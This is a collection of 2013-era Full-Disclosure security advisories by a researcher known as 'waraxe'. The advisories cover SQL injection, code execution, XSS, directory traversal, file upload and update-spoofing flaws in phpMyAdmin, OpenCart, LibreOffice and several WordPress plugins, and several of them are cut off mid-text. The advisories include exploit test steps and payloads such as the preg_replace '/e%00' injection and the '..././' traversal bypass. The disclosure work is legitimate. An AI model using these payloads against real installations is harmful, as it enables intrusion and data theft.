[Full-disclosure] [waraxe-2013-SA#104] - Multiple Vulnerabilities in Spider Event Calendar Wordpress Plugin
[waraxe-2013-SA#104] - Multiple Vulnerabilities in Spider Event Calendar
Wordpress Plugin
===
Author: Janek Vind "waraxe"
Date: 22. May 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-104.html
Description of vulnerable software:
~~~
Spider Event Calendar is a highly configurable plugin which allows you
to have multiple organized events in a calendar. This plugin is one of
the best WordPress Calendar available in WordPress Directory. If you
have problem with organizing your WordPress Calendar events and displaying
them in a calendar format, then Spider WordPress Calendar Plugin is the
best solution.
http://wordpress.org/extend/plugins/spider-event-calendar/
http://web-dorado.com/products/wordpress-calendar.html
Vulnerable is current version 1.3.0, older versions not tested.
###
1. Insufficient access check for AJAX operations in "calendar.php"
###
Reason:
1. weak access control implementation
Preconditions:
1. must be logged in as Wordpress user
Impact:
1. Any Wordpress user can edit Spider Calendar
Php script "calendar.php" line 197:
[ source code start ]--
add_action('wp_ajax_spidercalendarinlineedit', 'spider_calendar_quick_edit');
add_action('wp_ajax_spidercalendarinlineupdate',
'spider_calendar_quick_update');
function spider_calendar_quick_update(){
global $wpdb;
if(isset($_POST['calendar_id']) && isset($_POST['calendar_title']) &&
isset($_POST['us_12_format_sp_calendar'])){
$wpdb->update(
...
function spider_calendar_quick_edit(){
global $wpdb;
if(isset($_POST['calendar_id'])){
$row=$wpdb->get_row(
[ source code end ]
We can see, that AJAX actions "wp_ajax_spidercalendarinlineedit" and
"wp_ajax_spidercalendarinlineupdate" are bound to functions
"spider_calendar_quick_edit"
and "spider_calendar_quick_update". This two functions are meant to be used only
by admin, but there is nothing to stop low privileged users. Even users with
"Subscriber" access level can use those two AJAX functions.
Test:
http://localhost/wp351/wp-admin/admin-ajax.php?action=spidercalendarinlineedit";
method="post">
Result: calendar editing form will be shown
Remark: This weakness in access control makes next two SQL injection
vulnerabilities
much more critical - there is no need for admin privileges, even low level
Wordpress user is able to exploit these vulnerabilities.
###
2. SQL Injection in "calendar.php" function "spider_calendar_quick_update"
###
Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied POST parameter "calendar_id"
Preconditions:
1. must be logged in as Wordpress user
Php script "calendar.php" line 199:
[ source code start ]--
add_action('wp_ajax_spidercalendarinlineupdate',
'spider_calendar_quick_update');
function spider_calendar_quick_update(){
global $wpdb;
if(isset($_POST['calendar_id']) && isset($_POST['calendar_title']) &&
isset($_POST['us_12_format_sp_calendar'])){
...
$row=$wpdb->get_row("SELECT * FROM
".$wpdb->prefix."spidercalendar_calendar
WHERE id=".$_POST['calendar_id']);
[ source code end ]
As seen above, user-supplied POST parameter "calendar_id" is used in SQL query
without any sanitization, resulting in SQL injection vulnerability.
Test:
http://localhost/wp351/wp-admin/admin-ajax.php?action=spidercalendarinlineupdate";
method="post">
Result: in case of success it will be revealed sensitive information about
Wordpress user with ID 1: username, password hash and email.
###
3. SQL Injection in "calendar.php" function "spider_calendar_quick_edit"
###
Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied POST parameter "calendar_id"
Precondi
[Full-disclosure] [waraxe-2013-SA#103] - Multiple Vulnerabilities in phpMyAdmin
[waraxe-2013-SA#103] - Multiple Vulnerabilities in phpMyAdmin
===
Author: Janek Vind "waraxe"
Date: 25. April 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-103.html
Description of vulnerable software:
~~~
phpMyAdmin is a free software tool written in PHP, intended to handle the
administration of MySQL over the World Wide Web. phpMyAdmin supports a wide
range of operations with MySQL.
http://www.phpmyadmin.net/home_page/index.php
###
1. Remote code execution via preg_replace() in "libraries/mult_submits.inc.php"
###
Reason:
1. insufficient sanitization of user data before using in preg_replace
Attack vectors:
1. user-supplied parameters "from_prefix" and "to_prefix"
Preconditions:
1. logged in as valid PMA user
2. PHP version < 5.4.7 (Newer versions: Warning: preg_replace(): Null byte in
regex)
PMA security advisory: PMASA-2013-2
CVE id: CVE-2013-3238
Affected phpMyAdmin versions: 3.5.8 and 4.0.0-RC2
Result: PMA user is able to execute arbitrary PHP code on webserver
Let's take a look at the source code:
Php script "libraries/mult_submits.inc.php" line 426 (PMA version 3.5.8):
[ source code start ]--
case 'replace_prefix_tbl':
$current = $selected[$i];
$newtablename = preg_replace("/^" . $from_prefix . "/", $to_prefix,
$current);
$a_query = 'ALTER TABLE ' . PMA_backquote($selected[$i]) . ' RENAME ' .
PMA_backquote($newtablename) ; // CHANGE PREFIX PATTERN
$run_parts = true;
break;
case 'copy_tbl_change_prefix':
$current = $selected[$i];
$newtablename = preg_replace("/^" . $from_prefix . "/", $to_prefix,
$current);
$a_query = 'CREATE TABLE ' . PMA_backquote($newtablename) . ' SELECT * FROM
'
. PMA_backquote($selected[$i]) ; // COPY TABLE AND CHANGE PREFIX
PATTERN
$run_parts = true;
break;
[ source code end ]
We can see, that PHP variables "$from_prefix" and "$to_prefix" are used in
preg_replace function without any sanitization. It appears, that those variables
are coming from user submitted POST request as parameters "from_prefix" and
"to_prefix". It is possible to inject e-modifier with terminating null byte via
first parameter and php code via second parameter. In case of successful
exploitation injected PHP code will be executed on PMA webserver.
Tests:
1. Log in to PMA and select database:
http://localhost/PMA/index.php?db=test&token=25a6ce9e288070bd28c3f9aebffad1b8
2. select one table from database by using checkbox and then select
"Replace table prefix" from select control "With selected:".
3. We can see form named "Replace table prefix:" with two input fields.
Type "/e%00" to the "From" field and "phpinfo()" to the "To" field.
4. Activate Tamper Data Firefox add-on:
https://addons.mozilla.org/en-us/firefox/addon/tamper-data/
5. Click "Submit", Tamper Data pops up, choose "Tamper".
6. Now we can modify POST request. Look for parameter "from_prefix".
It should be "%2Fe%2500", remove "25", so that it becomes "%2Fe%00".
Click "OK" and Firefox will send out manipulated POST request.
7. We are greeted by phpinfo function output - code execution is confirmed.
PMA version 4.0.0-RC2 contains almost identical vulnerability:
Php script "libraries/mult_submits.inc.php" line 482 (PMA version 4.0.0-RC2):
[ source code start ]--
case 'replace_prefix_tbl':
$current = $selected[$i];
$newtablename = preg_replace("/^" . $_POST['from_prefix'] . "/",
$_POST['to_prefix'], $current);
$a_query = 'ALTER TABLE ' . PMA_Util::backquote($selected[$i]) .
' RENAME ' . PMA_Util::backquote($newtablename); // CHANGE PREFIX
PATTERN
$run_parts = true;
break;
case 'copy_tbl_change_prefix':
$current = $selected[$i];
$newtablename = preg_replace("/^" . $_POST['from_prefix'] . "/",
$_POST['to_prefix'], $current);
$a_query = 'CREATE TABLE ' . PMA_Util::backquote($newtablename) .
' SELECT * FROM ' . PMA_Util::backquote($selected[$i]); // COPY TABLE AND
CHANGE PREFIX PATTERN
$run_parts = true;
[Full-disclosure] [waraxe-2013-SA#102] - Reflected XSS in phpMyAdmin 3.5.7
[waraxe-2013-SA#102] - Reflected XSS in phpMyAdmin 3.5.7
===
Author: Janek Vind "waraxe"
Date: 09. April 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-102.html
Description of vulnerable software:
~~~
phpMyAdmin is a free software tool written in PHP, intended to handle the
administration of MySQL over the World Wide Web. phpMyAdmin supports a wide
range of operations with MySQL.
http://www.phpmyadmin.net/home_page/index.php
Affected are versions 3.5.0 to 3.5.7, older versions not vulnerable.
###
1. Reflected XSS in "tbl_gis_visualization.php"
###
Reason:
1. insufficient sanitization of html output
Attack vectors:
1. user-supplied parameters "visualizationSettings[width]" and
"visualizationSettings[height]"
Preconditions:
1. valid session
2. "token" parameter must be known
3. valid database name must be known
Php script "tbl_gis_visualization.php" line 51:
[ source code start ]--
// Get settings if any posted
$visualizationSettings = array();
if (PMA_isValid($_REQUEST['visualizationSettings'], 'array')) {
$visualizationSettings = $_REQUEST['visualizationSettings'];
...
[ source code end ]
Tests (parameters "db" and "token" must be valid):
http://localhost/PMA/tbl_gis_visualization.php?db=information_schema&;
token=17961b7ab247b6d2b39d730bf336cebb&
visualizationSettings[width]=">alert(123);
http://localhost/PMA/tbl_gis_visualization.php?db=information_schema&;
token=17961b7ab247b6d2b39d730bf336cebb
&visualizationSettings[height]=">alert(123);
Result: javascript alert box pops up, confirming Reflected XSS vulnerability.
Disclosure timeline:
~~~
31.03.2013 -> Sent email to developers
31.03.2013 -> First response email from developers
02.04.2013 -> Second email from developers - XSS patched in Git repository
03.04.2013 -> phpMyAdmin 3.5.8-rc1 is released
08.04.2013 -> phpMyAdmin 3.5.8 is released
09.04.2013 -> public advisory released
Contact:
~~~
come2war...@yahoo.com
Janek Vind "waraxe"
Waraxe forum: http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
Random project: http://albumnow.com/
-- [ EOF ] ___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [waraxe-2013-SA#101] - Update Spoofing Vulnerability in Royal TS 2.1
[waraxe-2013-SA#101] - Update Spoofing Vulnerability in Royal TS 2.1.5 === Author: Janek Vind "waraxe" Date: 29. March 2013 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-101.html Description of vulnerable software: ~~~ Royal TS is a simple, yet powerful tool for administrators, developers, system engineers and many other IT focused information workers that supports them in working effortless with their remote systems or management consoles. http://www.royalts.com/main/home/win.aspx Vulnerable is version 2.1.5, other versions not tested. ### 1. Update Spoofing Vulnerability ### Current version of Royal TS contains security vulnerability in update mechanism, which can be exploited by malicious people to conduct spoofing attacks. When checking for updates, Royal TS issues GET request over HTTP: GET /dl/RoyalTS/VersionInfo.xml?r=9:54:35%20PM HTTP/1.1 Cache-Control: no-cache Host: www.royalts.com Connection: Keep-Alive Server response: HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Fri, 16 Nov 2012 11:13:01 GMT Accept-Ranges: bytes ETag: "d11e6057ebc3cd1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Thu, 28 Mar 2013 19:54:39 GMT Content-Length: 13375 http://www.w3.org/2001/XMLSchema"; xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance";> 2 1 5 61116 http://www.royalts.com/dl/RoyalTS/RoyalTSInstaller_2.01.05.61116.msi <html lang="en" xmlns="http://www.w3.org/1999/xhtml"><; ... Royal TS user can click "Start Download" button and Royal TS will open web browser with download starting dialog. Such update mechanism contains security flaw: Update check is done over unencrypted HTTP channel. Malicious third party is able to conduct Man-in-the-Middle (MitM) attacks and spoof server response. In this way it is possible to instruct user to download malicious update. Testing: tests were done using Windows 7 and Apache webserver. Steps: 1. modify "windows/system32/drivers/etc/hosts" file in order to emulate DNS spoofing: 127.0.0.1 www.royalts.com 2. create xml file "/dl/RoyalTS/VersionInfo.xml" to the webserver directory with following content: http://www.w3.org/2001/XMLSchema"; xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance";> 2 3 4 61116 http://localhost/calc.exe New version 2.3.4 available! 3. Place "calc.exe" file to the webserver main directory. 4. Open Royal TS, it will check for updates automatically, resulting in dialog: New version 2.3.4 available! 5. Press "Start Download" button. Default web browser window will be open offering file download: "You have chosen to open calc.exe" Contact: ~~~ come2war...@yahoo.com Janek Vind "waraxe" Waraxe forum: http://www.waraxe.us/forums.html Personal homepage: http://www.janekvind.com/ Random project: http://albumnow.com/ -- [ EOF ] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [waraxe-2013-SA#100] - Update Spoofing Vulnerability in mRemote 1.50
[waraxe-2013-SA#100] - Update Spoofing Vulnerability in mRemote 1.50 === Author: Janek Vind "waraxe" Date: 29. March 2013 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-100.html Description of vulnerable software: ~~~ mRemote is a software solution that will allow you to manage all your remote control connections in a single place. Currently it supports the RDP, VNC, SSH2 and Telnet protocols. http://www.royalts.com/main/home/mRemote.aspx http://mremote-portable.softpile.com/58492/download/ Vulnerable is version 1.50, other versions not tested. ### 1. Update Spoofing Vulnerability ### Current version of mRemote contains security vulnerability in update mechanism, which can be exploited by malicious people to conduct spoofing attacks. When checking for updates, mRemote issues GET request over HTTP: GET /mRemote_Update.txt HTTP/1.1 Host: update.mremote.org Connection: Keep-Alive Server response: HTTP/1.1 200 OK Content-Length: 284 Content-Type: text/plain Last-Modified: Wed, 22 Apr 2009 18:29:48 GMT Accept-Ranges: bytes ETag: "16cc425178c3c91:1e75" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Thu, 28 Mar 2013 14:03:07 GMT Version: 1.50 dURL: http://www.mremote.org/wiki/GetFile.aspx?File=Downloads/mRemote_1.50_Setup.exe clURL: http://update.mRemote.org/mRemote_1.50_ChangeLog.txt imgURL: http://update.mRemote.org/banners/Banner_vRD09.png imgURLLink: http://www.visionapp.com/vRD2009-highlights.html mRemote user can click "Download and Install" button and mRemote will download and install the update. Such update mechanism contains two security flaws: 1. Update check is done over unencrypted HTTP channel. Malicious third party is able to conduct Man-in-the-Middle (MitM) attacks and spoof server response. In this way it is possible to instruct mRemote to download malicious update. 2. mRemote will execute downloaded update without digital signature verification. Testing: tests were done using Windows 7 and Apache webserver. Steps: 1. modify "windows/system32/drivers/etc/hosts" file in order to emulate DNS spoofing: 127.0.0.1 update.mremote.org 2. create text file "mRemote_Update.txt" to the webserver main directory with following content: Version: 1.51 dURL: http://localhost/calc.exe clURL: http://localhost/mRemote_1.51_ChangeLog.txt imgURL: http://update.mRemote.org/banners/Banner_vRD09.png imgURLLink: http://www.visionapp.com/vRD2009-highlights.html 3. create text file "mRemote_1.51_ChangeLog.txt" to the webserver main directory with following content: New version 1.51 available! 4. Place "calc_EN.exe" file to the webserver main directory. 5. Open mRemote, it will check for updates automatically. Response: New version 1.51 available! 6. Press "Download and Install" button. Successful download ends with response: Download complete! mRemote will now quit and begin with the installation. 7. Press "OK" button and downloaded exe file will be executed. Contact: ~~~ come2war...@yahoo.com Janek Vind "waraxe" Waraxe forum: http://www.waraxe.us/forums.html Personal homepage: http://www.janekvind.com/ Random project: http://albumnow.com/ -- [ EOF ] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [waraxe-2013-SA#099] - Update Spoofing Vulnerability in LibreOffice 4.0.1.2
[waraxe-2013-SA#099] - Update Spoofing Vulnerability in LibreOffice 4.0.1.2 === Author: Janek Vind "waraxe" Date: 21. March 2013 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-99.html Description of vulnerable software: ~~~ LibreOffice is a free and open source office suite, developed by The Document Foundation. It is descended from OpenOffice.org, from which it was forked in 2010. The LibreOffice suite includes a word processor, spreadsheet, graphics editor, slideshow creator, database and math formula writer. http://www.libreoffice.org/ Affected are versions 3.5.1 to newest 4.0.1.2, older versions were not tested. ### 1. Update Spoofing Vulnerability ### It appears, that current version of LibreOffice contains security vulnerability in update mechanism, which can be exploited by malicious people to conduct spoofing attacks. When checking for updates, LibreOffice issues GET request over HTTP: GET /check.php HTTP/1.1 Connection: TE, close TE: trailers Host: update.libreoffice.org Accept-Encoding: gzip Pragma: no-cache Accept-Language: en-US User-Agent: LibreOffice 4.0 .0.3 (7545bee9c2a0782548772a21bc84a9dcc583b89; Windows; x86; BundledLanguages=en-US af am ar as ast be bg bn bn-IN bo ...) Server at "update.libreoffice.org" responds with XML data: http://update.libreoffice.org/description";> LibreOffice 4.0.1 84102822e3d61eb989ddd325abf1ac077904985 Windows x86 4.0.1 http://www.libreoffice.org/download/"; /> LibreOffice user can click "Download" and "Install" buttons and LibreOffice will download and install the update. Such update mechanism contains two security flaws: 1. Update check is done over unencrypted HTTP channel. Malicious third party is able to conduct Man-in-the-Middle (MitM) attacks and spoof server response. In this way it is possible to instruct LibreOffice to download malicious update. 2. LibreOffice will execute downloaded update without digital signature verification. Testing: tests were done using Windows 7, Apache and PHP. Steps: 1. modify "windows/system32/drivers/etc/hosts" file in order to emulate DNS spoofing: 127.0.0.1 update.libreoffice.org 2. create php file "check.php" to the webserver main directory: http://update.libreoffice.org/description";> LibreOffice 5.6.7 123456789 Windows x86 5.6.7 http://localhost/notepad.exe"; /> '; ?> 3. Place "notepad.exe" file to the webserver main directory. 4. Open LibreOffice Writer -> Help -> Check For Updates Response: LibreOffice 5.6.7 is available. 5. Press "Download" button. Successful download ends with response: Download of LibreOffice 5.6.7 completed. Ready for installation. 6. Press "Install" button, choose "Yes" and after that Notepad will be opened. Contact: ~~~ come2war...@yahoo.com Janek Vind "waraxe" Waraxe forum: http://www.waraxe.us/forums.html Personal homepage: http://www.janekvind.com/ Random project: http://albumnow.com/ -- [ EOF ] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [waraxe-2013-SA#098] - Directory Traversal Vulnerabilities in OpenCart 1.5.5.1
[waraxe-2013-SA#098] - Directory Traversal Vulnerabilities in OpenCart 1.5.5.1
===
Author: Janek Vind "waraxe"
Date: 19. March 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-98.html
Description of vulnerable software:
~~~
OpenCart is a turn-key ready "out of the box" shopping cart solution.
You simply install, select your template, add products and your ready to start
accepting orders.
http://www.opencart.com/
Affected are all OpenCart versions, from 1.4.7 to 1.5.5.1, maybe older too.
###
1. Directory Traversal Vulnerabilities in "filemanager.php"
###
Reason: insufficient sanitization of user-supplied data
Attack vectors:
1. user-supplied POST parameters "directory", "name", "path", "from", "to"
Preconditions:
1. Logged in as admin with filemanager access privileges
Script "filemanager.php" offers for OpenCart admins various file related
services:
directory listing and creation, image file listing, file copy/move/unlink,
upload,
image resize. By the design OpenCart admin can manage files and directories only
inside specific subdirectory "image/data/". It means, that even if you have
OpenCart admin privileges, you still are not suppose to get access to the files
and directories below "image/data/". So far, so good.
But what about directory traversal? Let's have a look at the source code.
PHP script "admin/controller/common/filemanager.php" line 66:
[ source code start ]--
public function directory() {
$json = array();
if (isset($this->request->post['directory'])) {
$directories = glob(rtrim(DIR_IMAGE . 'data/' .
str_replace('../', '', $this->request->post['directory']), '/') .
'/*', GLOB_ONLYDIR);
if ($directories) {
$i = 0;
foreach ($directories as $directory) {
$json[$i]['data'] = basename($directory);
$json[$i]['attributes']['directory'] =
utf8_substr($directory, strlen(DIR_IMAGE . 'data/'));
...
$this->response->setOutput(json_encode($json));
[ source code end ]
We can see, that directory traversal is prevented by removing "../" substrings
from user submitted parameters. At first look this seems to be secure enough -
if we can't use "../", then directory traversal is impossible, right?
Deeper analysis shows couple of shortcomings in specific filtering method.
First problem - if OpenCart is hosted on Windows platform, then it's possible
to use "..\" substring for directory traversal.
Test (parameter "token" must be valid):
-[ test code start ]---
http://localhost/oc1551/admin/index.php?route=common/filemanager/directory&token=92aa6ac32b4c8e7a175c3dc9f7754d25";
method="post">
--[ test code end ]
Server response is in JSON format and contains listing of subdirectories outside
of OpenCart main directory.
Second problem - filtering with "str_replace" can be tricked by using custom
strings. If we use "..././" substring, then after filtering in becomes "../".
So it appears, that implemented anti-traversal code is ineffective and can
be bypassed.
Test (parameter "token" must be valid):
-[ test code start ]---
http://localhost/oc1551/admin/index.php?route=common/filemanager/directory&token=92aa6ac32b4c8e7a175c3dc9f7754d25";
method="post">
--[ test code end ]
Server response is exactly same as in previous test - information about
directory
structure outside of OpenCart main directory has been disclosed.
PHP script "filemanager.php" contains 14 uses of "str_replace('../', ''," code.
Most of the public functions in "filemanager.php" are affected by directory
traversal vulnerability:
public function directory() -> listing of subdirectories
public function files() -> listing of image files
public function create() -> creation of new directories
public function delete() -> deletion of arbitrary files and directorie
[Full-disclosure] [waraxe-2012-SA#096] - Multiple Vulnerabilities in Zenphoto 1.4.3.3
[waraxe-2012-SA#096] - Multiple Vulnerabilities in Zenphoto 1.4.3.3
===
Author: Janek Vind "waraxe"
Date: 03. November 2012
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-96.html
Description of vulnerable software:
~~~
Zenphoto is a standalone CMS for multimedia focused websites. Our focus lies on
being easy to use and having all the features there when you need them (but out
of the way if you do not.)
Zenphoto features support for images, video and audio formats, and the Zenpage
CMS plugin provides a fully integrated news section (blog) and custom pages to
run entire websites.
http://www.zenphoto.org/
https://code.google.com/p/zenphoto/
Affected versions: Zenphoto 1.4.3.3 and older
Patched version: Zenphoto 1.4.3.4
###
1. SQL Injection in "zp-core/zp-extensions/failed_access_blocker.php"
###
Reason: insufficient sanitization of user-supplied data
Attack vector: user-supplied HTTP header "X_FORWARDED_FOR"
Preconditions:
1. plugin "failed_access_blocker" activated (disabled by default)
"failed_access_blocker" plugin will log every failed authentication attempt:
Php script "zp-core/zp-extensions/failed_access_blocker.php" line 75:
[ source code start ]--
function failed_access_blocker_adminGate($allow, $page) {
...
// add this attempt
$sql = 'INSERT INTO '.prefix('plugin_storage').' (`type`, `aux`,`data`) VALUES
("failed_access", "'.time().'","'.getUserIP().'")';
query($sql);
// check how many times this has happened recently
count = db_count('plugin_storage','WHERE `type`="failed_access" AND
`data`="'.getUserIP().'"');
[ source code end ]
IP address of the user comes from function "getUserIP()" and is used in SQL
query. Let's look at the function "getUserIP()".
Php script "zp-core/functions.php" line 1979:
[ source code start ]--
function getUserIP() {
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
return sanitize($_SERVER['HTTP_X_FORWARDED_FOR'], 0);
} else {
return sanitize($_SERVER['REMOTE_ADDR'], 0);
[ source code end ]
Function "sanitize()" does following things to the input data:
1. strips slashes if magic_quotes_gpc=on
2. strips null bytes
3. strips html tags
So we can see, that function "sanitize()" will prevent null byte tricks and
most of the XSS exploits, but it does not escape or delete single and double
quotes, therefore SQL Injection may still be possible. Actually this function
makes SQL Injection more likely to occur because it reverts effects of the
"magic_quotes_gpc". As result of such insuffient input data sanitization,
attacker can use HTTP header "X_FORWARDED_FOR" for SQL Injection.
Test:
Let's use Firefox browser with Tamper Data Add-on.
1. Open admin page:
http://localhost/zenphoto1433/zp-core/admin.php
2. Activate Tamper data (Start Tamper)
3. Try to log in with bogus credentials, Tamper Data triggers
4. "Tamper with request?" -> "Tamper"
5. "Add element" -> X_FORWARDED_FOR=war"axe
6. Click "OK" and tampered request will go to the server
As result we will see blank page (OK 200 response code, content length 0).
But let's look at "debug.log" in "zp-data":
Backtrace: USER ERROR: MySql Error: ( INSERT INTO `[prefix]plugin_storage`
(`type`, `aux`,`data`) VALUES ("failed_access", "1349792737","war"axe") )
failed. MySql returned the error You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right
syntax to use near 'axe")'
###
2. SQL Injection in "zp-core/zp-extensions/search_statistics.php"
###
Reason: insufficient sanitization of user-supplied data
Attack vector: user-supplied HTTP header "X_FORWARDED_FOR"
Preconditions:
1. plugin "search_statistics" activated (disabled by default)
Php script "zp-core/zp-extensions/search_statistics.php" line 101:
[ source code start ]---
[Full-disclosure] [waraxe-2012-SA#095] - Multiple Vulnerabilities in Wordpress FoxyPress Plugin
[waraxe-2012-SA#095] - Multiple Vulnerabilities in Wordpress FoxyPress Plugin
===
Author: Janek Vind "waraxe"
Date: 30. October 2012
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-95.html
Description of vulnerable target:
~~~
FoxyPress is a FREE shopping cart and product management tool that integrates
with FoxyCart's e-commerce solution to help you get your store up and running
quickly and efficiently.
http://wordpress.org/extend/plugins/foxypress/
Affected version: 0.4.2.5
###
1. Arbitrary File Upload Vulnerability in "documenthandler.php"
###
Reasons: Missing security checks in file upload functionality
Attack vectors: Uploaded file
Preconditions: Logged in as admin with FoxyPress product editing privileges
Php script "documenthandler.php" line 14:
[ source code start ]--
if (!empty($_FILES)) {
...
$targetpath = ABSPATH . INVENTORY_DOWNLOADABLE_LOCAL_DIR;
...
$newfilename = foxypress_GenerateNewFileName($fileExtension, $inventory_id,
$targetpath, $prefix);
$targetpath = $targetpath . $newfilename;
if(move_uploaded_file($_FILES['Filedata']['tmp_name'], $targetpath))
[ source code end ]
As we can see above, there is no security checks against uploaded file. As
result, attacker is able to upload files with arbitrary extension to remote
system. In case of php files this vulnerability leads to RCE (Remote Code
Execution).
Test:
1. Open product editing webpage:
http://localhost/wp342/wp-admin/post.php?post=43&action=edit
2. Look for "Digital Downloads". Insert some number to the input box below:
"Max Downloads allowed (if you need to override the main setting)".
3. There must be "Browse Files" button (Flash-based). Choose the php file, you
want to upload.
We can observe AJAX in action and as result download link appears:
http://localhost/wp342/wp-content/inventory_downloadables/my_download_jw82ku0jz9_43.php
Opening that download link will execute previously uploaded php file.
###
2. SQL Injection Vulnerability in "documenthandler.php"
###
Reasons: Insufficient sanitization of user-supplied data
Attack vectors: User-supplied POST parameter "prefix"
Preconditions: Logged in as admin with FoxyPress product editing privileges
Php script "documenthandler.php" line 14:
[ source code start ]--
if (!empty($_FILES)) {
$inventory_id = intval( $_POST['inventory_id'] );
$downloadabletable = $_POST['prefix'];
...
$query = "INSERT INTO " . $downloadabletable . " SET inventory_id='"
. $inventory_id . "', filename='" . mysql_escape_string($newfilename)
. "', maxdownloads= '" . mysql_escape_string($downloadablemaxdownloads)
. "', status = 1";
$wpdb->query($query);
[ source code end ]
We can see, that user-supplied POST parameter "prefix" in used in subsequent
SQL "INSERT INTO" query as table name. There is no input data sanitization,
therefore attacker is able to insert any data to any tables in current database.
Test (parameter "security" must be valid):
-[ test code start ]---
http://localhost/wp342/wp-admin/admin-ajax.php?action=foxypress_download&security=844b64ce45";
method="post" enctype="multipart/form-data">
--[ test code end ]
Result (Wordpress must be set to show SQL errors):
WordPress database error: [Table 'wp342.waraxe' doesn't exist]
INSERT INTO waraxe SET inventory_id='0',
filename='downloadable_qga73aojs8_0.php', maxdownloads= '1', status = 1
###
3. SQL Injection Vulnerability in "foxypress-manage-emails.php"
###
Reasons: Insufficient sanitization of user-supplied data
Attack vectors: User-supplied GET parameter "id"
Preconditions: Logged in as admin with FoxyPress management privileges
Php script &quo
[Full-disclosure] [waraxe-2012-SA#094] - Multiple Vulnerabilities in Wordpress GRAND Flash Album Gallery Plugin
[waraxe-2012-SA#094] - Multiple Vulnerabilities in Wordpress GRAND Flash Album
Gallery Plugin
=
Author: Janek Vind "waraxe"
Date: 24. October 2012
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-94.html
Description of vulnerable target:
~~~
Try GRAND Flash Album Gallery - powerful flash & jQuery media content plugin.
It provides a comprehensive interface for handling image galleries, audio and
video. You can edit your media content the way you want: upload images, import
music and video, create photo gallery, music playlists, group pictures in
slideshow and add descriptions for each image, mp3 or video - GRAND FlAGallery
is the smart choice when showing the best of your product or describing in brief
any event.
http://codeasily.com/wordpress-plugins/flash-album-gallery/flag
http://wordpress.org/extend/plugins/flash-album-gallery/
Affected versions: 1.9.0, 2.0.0
###
1. Arbitrary File Overwrite Vulnerability in "admin/skin_options.php"
###
Reasons:
1. Insecure use of "parse_str()"
2. Uninitialized variable "$mainXML"
Attack vector: User-supplied POST parameters "settingsXML" and "mainXML"
Precondition: Logged in as admin with "FlAG Change skin" privileges
Php script "admin/skin_options.php" line:
[ source code start ]--
$settingsXML = $settings.'/settings.xml';
$flashPost = file_get_contents("php://input");
// parse properties_skin
parse_str($flashPost);
if(isset($properties_skin) && !empty($properties_skin)) {
$fp = fopen($settingsXML, "r");
if(!$fp) {
exit( "2");//Failure - not read;
}
while(!feof($fp)) {
$mainXML .= fgetc($fp);
}
$fp = fopen($settingsXML, "w");
if(!$fp)
exit("0");//Failure
$newProperties = preg_replace("|.*?|si",
$properties_skin, $mainXML);
fwrite($fp, $newProperties);
fclose($fp);
echo "1";//Save
[ source code end ]
As we can observe, php function "parse_str()" is used with user-supplied POST
parameters as argument. This is very dangerous coding style, because it's
possible to overwrite any variables set before this code line.
Attacker can overwrite variable "$settingsXML", which is used as path to the
file, being overwritten in next steps. So it's obvious, that attacker can choose
any files on remote system to be overwritten. Next interesting problem here is,
that variable "$mainXML" is uninitialized. It means, that attacker is able to
write any data to that variable, using the same "parse_str()", and as result,
arbitrary data can be written (prepended) to arbitrary file on remote system.
Attacker can utilize this vulnerability for injecting php code to existing files
on remote system, which ultimately leads to RCE (Remote Code Execution).
Test (file "wp-content/plugins/hello.php" must exist and be writable):
-[ test code start ]---
http://localhost/wp342/wp-content/plugins/flash-album-gallery/admin/skin_options.php";
method="post">
--[ test code end ]
Injected php code can be executed by following request:
http://localhost/wp342/wp-content/plugins/hello.php
###
2. Arbitrary File Overwrite Vulnerability in "lib/constructor.php"
###
Reasons:
1. Insecure use of "parse_str()"
2. Uninitialized variable "$mainXML"
Attack vector: User-supplied POST parameters "skin_name" and "mainXML"
Preconditions:
1. Logged in as admin with "FlAG Change skin" privileges
2. "magic_quotes_gpc=off" for successful null-byte attacks
3. PHP must be < 5.3.4 for successful null-byte attacks
Php script "lib/constructor.php" line 25:
[ source code start ]--
$flashPost = file_get_contents("php://input");
// parse properties_skin
parse_str($flashPost);
$settingsXML = str_replace("\\","/", dirname(dirname(dirname(__FILE__))).
'/flagallery-skins/'.$skin_name.'/settings/settings.xml');
if(isset($properties_skin) && !empty($properties_skin)) {
$fp
[Full-disclosure] [waraxe-2012-SA#093] - Multiple Vulnerabilities in Wordpress Social Discussions Plugin
[waraxe-2012-SA#093] - Multiple Vulnerabilities in Wordpress Social Discussions
Plugin
==
Author: Janek Vind "waraxe"
Date: 17. October 2012
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-93.html
Description of vulnerable target:
~~~
Enables Social Sharing of your blog posts to 30+ Social Networks. Plugin also
enables you to Automatically Publish or Self Publish your Blog Posts to 25+
Networks.
http://wordpress.org/extend/plugins/social-discussions/
Affected version: 6.1.1
###
